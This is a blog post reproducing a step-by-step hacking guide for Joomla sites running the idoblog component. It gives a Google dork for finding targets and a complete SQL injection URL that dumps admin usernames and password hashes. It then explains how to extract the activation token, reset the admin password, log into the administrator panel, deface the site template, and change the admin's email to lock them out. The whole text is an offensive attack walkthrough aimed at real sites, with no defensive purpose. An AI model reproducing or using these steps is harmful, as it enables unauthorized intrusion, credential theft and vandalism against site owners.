Sabtu, 12 April 2014

Hacking Administrator

Hacking Administrator Joomla – Get Full Access!
Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge
Finding Exploit And Target
Those two steps could go in different order, depend what you find first target or exploit…
Google dork: inurl:”option=com_idoblog”
Comes up with results for about 140,000 pages
[Image: 001cv.png]
At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
[Image: 002rg.png]
==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users–
Exploit can be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users–
This part looking for username and password from jos_users table
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally…
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have
[Image: 003bd.png]
Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data
Let Dump username, email, password from Column Name jos153_users. Click on Dump Now
[Image: 004k.png]
username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time…
The easiest way to hack is to reset Admin password!
Admin Password Reset
Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request
[Image: 005hy.png]
Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:
Finding Token
To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users
[Image: 006fj.png]
username: admin
activation: 5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.
[Image: 007pa.png]
If you done everything ok, Rest your Password page will load. Enter your new password…
After that go to:
Code:
http://www.site.com/administrator/
Standard Joomla portal content management system
Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
[Image: 008bo.png]
To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail
[Image: 009kw.png]
Credit: MindFreak [HckGuide]

Tidak ada komentar:

Posting Komentar